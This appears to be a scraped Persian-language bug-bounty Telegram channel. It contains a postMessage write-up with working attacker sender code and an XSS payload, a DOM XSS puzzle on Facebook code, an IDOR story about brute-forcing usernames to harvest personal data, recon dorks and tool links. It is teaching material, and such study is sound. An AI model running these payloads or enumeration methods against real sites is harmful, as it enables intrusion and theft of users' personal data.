چجوری تو این کد میتونیم به Dom Xss برسیم ؟
بعد از اینکه تلاشتون رو کردید بشینید رایتاپش رو هم بخونید :
https://ysamm.com/2023/01/29/dom-xss-in-instant-games-due-to-improper-verification-of-supplied-urls.html
__d("goURIOnWindow", ["ConstUriUtils", "FBLogger", "err"], (function(a, b, c, d, e, f, g) {
"use strict";
function a(a, b) {
var e = typeof b === "string" ? d("ConstUriUtils").getUri(b) : b;
if (e)
a.location = e.toString();
else {
a = "Invalid URI " + b.toString() + " provided to goURIOnWindow";
c("FBLogger")("comet_infra").blameToPreviousFrame().mustfix(a)
}
}
g["default"] = a
}
), 98);بعد از اینکه تلاشتون رو کردید بشینید رایتاپش رو هم بخونید :
https://ysamm.com/2023/01/29/dom-xss-in-instant-games-due-to-improper-verification-of-supplied-urls.html
امروز داشتم یه ریپورتی در رابطه با postMessage میخوندم که دوست داشتم اینجا بازش کنم :
ما یه همچین listener ای رو داریم :
خب حالا مشکل این listener چیه ؟ توی این قسمت if (!i داره چک میکنه که اگه referrer خالی باشه این شرط پاس بشه و مشکلی نداره پس اگه referrer ما خالی باشه دیگه به شرط بعدی e.origin نمیرسه و نکته مهمی که اینجا هست اینه که توی postMessage هیچ هدر referrer ای ست نمیشه پس اگه من یه sender داشته باشم به راحتی میتونم به اینجا Message بفرستم.
پس کد sender ما میشه :
حالا تو ادامه اش هم اومده بود یه route دیگه پیدا کرده بود که اونجا xss میخورد :
ما یه همچین listener ای رو داریم :
Receiver: function (e) {
var n, r = this.get("replaceRoute"), i = this.get("referrer");
if (!i || e.origin === normalize(i)) {
try { n = JSON.parse(e.data); } catch (u) {}
// ...
}
}خب حالا مشکل این listener چیه ؟ توی این قسمت if (!i داره چک میکنه که اگه referrer خالی باشه این شرط پاس بشه و مشکلی نداره پس اگه referrer ما خالی باشه دیگه به شرط بعدی e.origin نمیرسه و نکته مهمی که اینجا هست اینه که توی postMessage هیچ هدر referrer ای ست نمیشه پس اگه من یه sender داشته باشم به راحتی میتونم به اینجا Message بفرستم.
پس کد sender ما میشه :
win = window.open("https://transact.victim.com/");
win.postMessage(JSON.stringify({
action: "replaceRoute",
route: "application_error",
model: { error: 500, noscript: "injected", message: "from attacker" }
}), "*");حالا تو ادامه اش هم اومده بود یه route دیگه پیدا کرده بود که اونجا xss میخورد :
win.postMessage(JSON.stringify({
action: "replaceRoute",
route: "voucher.multi-product-details",
model: {
eligible: true,
sku: {
id: 0, longDenoscription: `
<img src=x onerror='alert(document.domain)'>`
}
}
}), "*");A Hacker's Notebook Part II : Real Techniques from the World of Bug Bounty
https://snapdragon-copper-dd1.notion.site/A-Hacker-s-Notebook-Real-Techniques-from-the-World-of-Bug-Bounty-Part-II-28fa797be4c68046999af6b668a736a4?pvs=73
By: @bugbountyhints && GitBook_s.t.me
https://snapdragon-copper-dd1.notion.site/A-Hacker-s-Notebook-Real-Techniques-from-the-World-of-Bug-Bounty-Part-II-28fa797be4c68046999af6b668a736a4?pvs=73
By: @bugbountyhints && GitBook_s.t.me
snapdragon-copper-dd1 on Notion
A Hacker’s Notebook: Real Techniques from the World of Bug Bounty — Part II | Notion
Quick Summary
Bugbountyhints
A Hacker's Notebook Part II : Real Techniques from the World of Bug Bounty https://snapdragon-copper-dd1.notion.site/A-Hacker-s-Notebook-Real-Techniques-from-the-World-of-Bug-Bounty-Part-II-28fa797be4c68046999af6b668a736a4?pvs=73 By: @bugbountyhints && GitBook_s.t.me
تو این نوشن سعی کردیم نکات مفیدی رو از رایتاپ ها جمع کنیم و قرار بدیم
Bugbountyhints
این ماه هم با ۱۳۹ ساعت کار تموم شد. اونجوری که باید پیش نرفت و کارای اداری و دیپلم دهنمون رو سرویس کرد بریم که مهر ماه رو بترکونیم
این ماه هم تقریبا با ۲۱۹ ساعت کار تموم شد.
تمرکز اصلی ایم روی هانت، js و oauth بود که تونستم تا یه لولی بهترشون کنم
این ماه هم یکم دوست دارم رو قسمت غیر فنی داستان تمرکز کنم و البته oauth و js رو بهتر کنم
تمرکز اصلی ایم روی هانت، js و oauth بود که تونستم تا یه لولی بهترشون کنم
این ماه هم یکم دوست دارم رو قسمت غیر فنی داستان تمرکز کنم و البته oauth و js رو بهتر کنم
Forwarded from Hack Hive
https://medium.com/@horamah.71/static-code-analysis-and-the-role-of-ai-in-sast-3ac5d305daac
https://x.com/horamah_71/status/1985624183422746889?t=N4k77A7l30ZUHCp1RMcG5w&s=19
https://x.com/horamah_71/status/1985624183422746889?t=N4k77A7l30ZUHCp1RMcG5w&s=19
Medium
🔍Static Code Analysis and the Role of AI in SAST
Hey everyone! 👋 I’m @horamah.71, sharing my latest research, exploits, and security discoveries. Stay tuned for more deep dives!
Let’s…
Let’s…
Forwarded from BLACK MEMORIES 📂 (Black Folder)
* IDOR *
وقتی وارد سایت شدم، فقط یه فرم لاگین و یه صفحهی تماس داشت، هیچ چیز دیگهای نبود. جاوااسکریپت رو چک کردم، چیزی بالا نیومد. گوگل دورک زدم، بینتیجه. waybackurl و چند روش دیگه هم تست کردم، باز هیچی.
رفتم گیتهاب، دامین سایت رو اونجا سرچ کردم و یه API خاص پیدا کردم:
blackfolder.ir/api/userinfo/showUserDetails/jrodriguez75
وقتی بازش کردم، دیدم اطلاعات یه کاربر داره لو میره — شماره تلفن، آدرس، شناسه ملی و... .
گزارش رو برای هکروان فرستادم، گفتن ایمپکتش مدیوم چون برای اکسپلویت باید یوزرنیم رو بدونی.
آیدی رو با اعداد تست زدم (مثل 74، 76 و...) ولی جواب نداد، که بعدش به یه چیز فوق العاده جالب رسیدم :
یوزرنیم فعلی jrodriguez75 بود. وقتی عدد 75 رو پاک کردم، اطلاعات یه کاربر دیگه لود شد!
اینجا بود که متوجه شدم سایت یه پترن خاص برای ساخت یوزرنیمها داره. بر اساس حرف اول اسم + نام خانوادگی، و اگه تکراری باشه یه عدد (معمولاً سال تولد) به آخرش اضافه میکنه.
مثلاً اگه اسم “Black Folder” باشه و سال 65 متولد شده باشی، یوزرنیمت میشه bfolder65.
حالا چلنج این بود که چطوری نامخانوادگیهای مختلف رو پیدا کنم.
از AI خواستم برام یه اسکریپت درست کنه که ۱۰ تا نامخانوادگی محبوب آمریکایی تولید کنه، بعد با ترکیب حروف A تا Z برای بخش اسم، شروع کنه به بروتفورس یوزرنیمها.
اگه یه ریسپانس با کد 200 برمیگشت، اون یوزرنیم معتبر حساب میشد و بعد بخش عددیش (مثلاً سال تولد) رو از 1960 تا 1999 بروتفورس کردم. ✅
نتیجه چی شد؟ یه لیست از اطلاعات کاربران، شامل شماره تلفن، آدرس خونه، شناسه ملی و... بدست اومد و ارسال کردم برای هکروان و ایمپکت از مدیوم رفت به کریتیکال.
خلاصه ی ویدیو : NahamSec👤
وقتی وارد سایت شدم، فقط یه فرم لاگین و یه صفحهی تماس داشت، هیچ چیز دیگهای نبود. جاوااسکریپت رو چک کردم، چیزی بالا نیومد. گوگل دورک زدم، بینتیجه. waybackurl و چند روش دیگه هم تست کردم، باز هیچی.
رفتم گیتهاب، دامین سایت رو اونجا سرچ کردم و یه API خاص پیدا کردم:
blackfolder.ir/api/userinfo/showUserDetails/jrodriguez75
وقتی بازش کردم، دیدم اطلاعات یه کاربر داره لو میره — شماره تلفن، آدرس، شناسه ملی و... .
گزارش رو برای هکروان فرستادم، گفتن ایمپکتش مدیوم چون برای اکسپلویت باید یوزرنیم رو بدونی.
آیدی رو با اعداد تست زدم (مثل 74، 76 و...) ولی جواب نداد، که بعدش به یه چیز فوق العاده جالب رسیدم :
یوزرنیم فعلی jrodriguez75 بود. وقتی عدد 75 رو پاک کردم، اطلاعات یه کاربر دیگه لود شد!
اینجا بود که متوجه شدم سایت یه پترن خاص برای ساخت یوزرنیمها داره. بر اساس حرف اول اسم + نام خانوادگی، و اگه تکراری باشه یه عدد (معمولاً سال تولد) به آخرش اضافه میکنه.
مثلاً اگه اسم “Black Folder” باشه و سال 65 متولد شده باشی، یوزرنیمت میشه bfolder65.
حالا چلنج این بود که چطوری نامخانوادگیهای مختلف رو پیدا کنم.
از AI خواستم برام یه اسکریپت درست کنه که ۱۰ تا نامخانوادگی محبوب آمریکایی تولید کنه، بعد با ترکیب حروف A تا Z برای بخش اسم، شروع کنه به بروتفورس یوزرنیمها.
اگه یه ریسپانس با کد 200 برمیگشت، اون یوزرنیم معتبر حساب میشد و بعد بخش عددیش (مثلاً سال تولد) رو از 1960 تا 1999 بروتفورس کردم. ✅
نتیجه چی شد؟ یه لیست از اطلاعات کاربران، شامل شماره تلفن، آدرس خونه، شناسه ملی و... بدست اومد و ارسال کردم برای هکروان و ایمپکت از مدیوم رفت به کریتیکال.
خلاصه ی ویدیو : NahamSec👤
YouTube
This is How a Simple IDOR Earned Me a Max Bug Bounty Payout
LIKE and SUBSCRIBE with NOTIFICATIONS ON if you enjoyed the video! 👍
📚 If you want to learn bug bounty hunting from me: https://bugbounty.nahamsec.training
💻 If you want to practice some of my free labs and challenges: https://app.hackinghub.io
💵 FREE…
📚 If you want to learn bug bounty hunting from me: https://bugbounty.nahamsec.training
💻 If you want to practice some of my free labs and challenges: https://app.hackinghub.io
💵 FREE…
یکی از تکنیک هایی که تو ریکان استفاده میکنم، در آوردن ساب دامین از سوشال مدیا هستش که نتیجه خوبی هم ازش میگیرم
یه سری dork جنریت میکنم و دامین مورد نظر خودم رو توش میزارم، مثل :
site:x.com "domain.tld"
site:instagram.com "domain.tld"
site:linkedin.com "domain.tld"
site:reddit.com "domain.tld"
اینجوری به یه سری توییت یا پست قدیمی و جدید میرسم که راجع به سابدامینی کامنت گذاشتن و بعد میرم چک میکنم که بالا هستن یا نه.
یه سری dork جنریت میکنم و دامین مورد نظر خودم رو توش میزارم، مثل :
site:x.com "domain.tld"
site:instagram.com "domain.tld"
site:linkedin.com "domain.tld"
site:reddit.com "domain.tld"
اینجوری به یه سری توییت یا پست قدیمی و جدید میرسم که راجع به سابدامینی کامنت گذاشتن و بعد میرم چک میکنم که بالا هستن یا نه.
Bugbountyhints
این ماه هم تقریبا با ۲۱۹ ساعت کار تموم شد. تمرکز اصلی ایم روی هانت، js و oauth بود که تونستم تا یه لولی بهترشون کنم این ماه هم یکم دوست دارم رو قسمت غیر فنی داستان تمرکز کنم و البته oauth و js رو بهتر کنم
این ماه هم با ۱۴۶ ساعت کار تموم شد.
تایم کاری و هانتم نسبت به ماه قبل خیلی پایین اومد
ولی از نظر یادگیری ۲ برابر ماه پیش بوده
تایم کاری و هانتم نسبت به ماه قبل خیلی پایین اومد
ولی از نظر یادگیری ۲ برابر ماه پیش بوده
فول تایم هانتر بودن اینجوریه که یه ماه مثل کارتون خوابا زندگی میکنی بعد یه شب بهت چند تا باگ میخوره ورق عوض میشه
ابزار subScraper از XSS-Rat. خودم فعلا بالا نیاوردمش ولی از شات هایی که گذاشته بود میشه گفت که ابزار باحال و کار راه بندازیه.
https://github.com/The-XSS-Rat/subScraper?tab=readme-ov-file
https://github.com/The-XSS-Rat/subScraper?tab=readme-ov-file
GitHub
GitHub - The-XSS-Rat/subScraper
Contribute to The-XSS-Rat/subScraper development by creating an account on GitHub.
اینم توییت خود XSS-Rat که راجب ابزار یه سری توضیحات داده :
https://x.com/theXSSrat/status/2001406924684956063
https://x.com/theXSSrat/status/2001406924684956063
X (formerly Twitter)
The XSS Rat - Proud XSS N00b :-) (@theXSSrat) on X
Hello amazing hackers!
I want you to meet a tool that i have written for myself but I noticed others wanted to use it - So I open sourced it!
Meet SubScraper!
https://t.co/fHiR4LAHS1
Can you please give it a star on github and share it on your social…
I want you to meet a tool that i have written for myself but I noticed others wanted to use it - So I open sourced it!
Meet SubScraper!
https://t.co/fHiR4LAHS1
Can you please give it a star on github and share it on your social…
Forwarded from digMeMore (Yasho)
YouTube
گفت گو با امیر
امروز با امیر صحبت کردم، امیر تازه این فیلدو شروع کرده ولی به نتیجهای رسیده که بچهها تو ۲ سال انتظار دارن برسن، چی شده که امیر زودتر نتیجه گرفته؟ خودم کنجکاو بودم تو این مصاحبه، نسب به مصاحبه قبل بیشتر مصاحبه شونده رو تحلیل کردم، امیدوارم خوشتون بیاد، اگه…
چند تا لایو هانت خوب و کاربردی که میتونید ببینید
1 - https://youtu.be/PPkefBxGSFY?si=Np_pFXLxDanSJLIt
2 - https://youtu.be/J2_lHfuIgu8?si=iUhq_209HurBvptW
3 - https://youtu.be/puwFXmTgLFg?si=0LmOhZZcAhQ6jNLD
4 - https://youtu.be/6TWufwZLh2w?si=k4YojFQIGiToIOtJ
5 - https://www.youtube.com/watch?v=9mdLNRD0IEI&t=78s&pp=ygUUbGl2ZSBodW50IGJ1ZyBib3VudHk%3D
6 - https://www.youtube.com/watch?v=Kw1tPiVxBTg&pp=ygUUbGl2ZSBodW50IGJ1ZyBib3VudHnSBwkJTQoBhyohjO8%3D
7 - https://www.youtube.com/watch?v=qR0ez9xZr_8&pp=ygUUbGl2ZSBodW50IGJ1ZyBib3VudHk%3D
1 - https://youtu.be/PPkefBxGSFY?si=Np_pFXLxDanSJLIt
2 - https://youtu.be/J2_lHfuIgu8?si=iUhq_209HurBvptW
3 - https://youtu.be/puwFXmTgLFg?si=0LmOhZZcAhQ6jNLD
4 - https://youtu.be/6TWufwZLh2w?si=k4YojFQIGiToIOtJ
5 - https://www.youtube.com/watch?v=9mdLNRD0IEI&t=78s&pp=ygUUbGl2ZSBodW50IGJ1ZyBib3VudHk%3D
6 - https://www.youtube.com/watch?v=Kw1tPiVxBTg&pp=ygUUbGl2ZSBodW50IGJ1ZyBib3VudHnSBwkJTQoBhyohjO8%3D
7 - https://www.youtube.com/watch?v=qR0ez9xZr_8&pp=ygUUbGl2ZSBodW50IGJ1ZyBib3VudHk%3D
Forwarded from Hora🌑
بچه ها اگر توی دیدن اینا تنبلیتون میشه
یه راه داره اونم notegpt.io استفاده کنید لذت ببرید☺️
یه راه داره اونم notegpt.io استفاده کنید لذت ببرید☺️
یکی از اکستنشن هایی که میتونید برای بررسی کلی js استفاده کنید JS Recon Buddy هستش.
قابلیت ها :
۱ - درآوردن ساب دامین از js
۲ - پیدا کردن اندپوینت ها
۳ - سینک های احتمالی برای پیدا کردن dom xss
۴ - پارامتر ها
و...
Firefox : firefox ext
chrome: chrome ext
از گیت هابش هم میتونید اینستال کنید : https://github.com/TheArqsz/JSRecon-Buddy
قابلیت ها :
۱ - درآوردن ساب دامین از js
۲ - پیدا کردن اندپوینت ها
۳ - سینک های احتمالی برای پیدا کردن dom xss
۴ - پارامتر ها
و...
Firefox : firefox ext
chrome: chrome ext
از گیت هابش هم میتونید اینستال کنید : https://github.com/TheArqsz/JSRecon-Buddy